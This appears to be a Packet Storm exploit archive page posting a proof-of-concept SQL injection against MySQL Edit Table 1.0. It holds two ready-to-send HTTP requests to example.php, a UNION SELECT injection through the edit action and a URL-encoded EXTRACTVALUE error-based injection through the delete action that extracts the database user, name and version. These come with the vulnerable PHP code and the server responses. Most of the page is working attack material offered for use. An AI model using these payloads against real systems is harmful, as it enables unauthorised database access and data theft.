what you don't know can hurt you

MySQL Edit Table 1.0 SQL Injection

MySQL Edit Table 1.0 SQL Injection
Posted Oct 22, 2018
Authored by Ihsan Sencan

MySQL Edit Table version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 19c3b4630111dd4e32c4693e85b43bd9

MySQL Edit Table 1.0 SQL Injection

Change Mirror Download
# Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.bookman.nl
# Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL]
# function edit_rec() {
# if (isset ($_GET['id'])) $in_id = $_GET['id'];
# if ($_GET['mte_a'] == 'edit') $edit=1;
# else $edit = 0;
# $count_required = 0;
# $rows = '';
# $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`");

GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 14:34:58 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT
Content-Length: 3642
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/example.php?mte_a=del&id=[SQL]
#
# function del_rec() {
# $in_id = $_GET['id'];
# if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) {
# $this->content_deleted = "

GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 14:38:18 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT
Content-Length: 1046
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close